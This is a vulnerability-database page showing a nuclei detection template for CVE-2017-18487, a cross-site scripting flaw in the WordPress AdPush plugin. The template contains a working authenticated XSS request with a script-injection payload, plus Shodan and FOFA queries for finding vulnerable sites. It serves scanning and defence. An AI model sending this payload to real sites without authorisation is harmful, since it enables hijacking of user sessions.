Lucene search
K

AdPush < 1.44 - Cross-Site Scripting

🗓️ 23 Jun 2026 05:08:33Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 24 Views

AdPush < 1.44 - Cross-Site Scripting in WordPress plugi

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNVD
WordPress adsense-plugin plugin cross-site scripting vulnerability
14 Oct 201900:00
cnvd
CVE
CVE-2017-18487
13 Aug 201917:54
cve
Cvelist
CVE-2017-18487
13 Aug 201917:54
cvelist
EUVD
EUVD-2017-9603
7 Oct 202500:30
euvd
NVD
CVE-2017-18487
13 Aug 201918:15
nvd
OSV
CVE-2017-18487
13 Aug 201918:15
osv
Prion
Cross site scripting
13 Aug 201918:15
prion
RedhatCVE
CVE-2017-18487
9 Jan 202610:33
redhatcve
wpexploit
Multiple BestWebSoft Plugins - Authenticated Cross-Site Scripting (XSS)
12 Apr 201700:00
wpexploit
WPVulnDB
Multiple BestWebSoft Plugins - Authenticated Cross-Site Scripting (XSS)
12 Apr 201700:00
wpvulndb
Rows per page
id: CVE-2017-18487

info:
  name: AdPush < 1.44 - Cross-Site Scripting
  author: luisfelipe146
  severity: medium
  description: |
    The adsense-plugin (aka Google AdSense) plugin before 1.44 for WordPress has multiple XSS issues.
  impact: |
    Authenticated attackers can execute arbitrary JavaScript in victims' browsers, potentially stealing session cookies, credentials, or performing actions on behalf of users.
  remediation: |
    Update to version 1.44 or later.
  reference:
    - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694
    - https://nvd.nist.gov/vuln/detail/CVE-2017-18487
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18487
    - https://wordpress.org/plugins/adsense-plugin/#developers
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2017-18487
    cwe-id: CWE-79
    epss-score: 0.01464
    epss-percentile: 0.70227
    cpe: cpe:2.3:a:google_adsense_project:google_adsense:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: google_adsense_project
    product: google_adsense
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/adsense-plugin/
    fofa-query: body=/wp-content/plugins/adsense-plugin/
    publicwww-query: "/wp-content/plugins/adsense-plugin/"
  tags: cve,cve2017,wordpress,wpscan,wp-plugin,xss,bws-adpush,authenticated,google_adsense_project,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /wp-content/plugins/adsense-plugin/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(header_2, "text/html")'
          - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")'
          - 'contains(body_3, "Google AdSense")'
        condition: and
# digest: 4a0a00473045022100969e9010e32fba9f2726092a9f94261c2d7922e2d13b88f986fb10cfcf31baa502207fb7d6be3e3554852497a347424bb744e4b7bca405b5c9097d01b6200825597f:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 24.3
CVSS 36.1
EPSS0.01464
24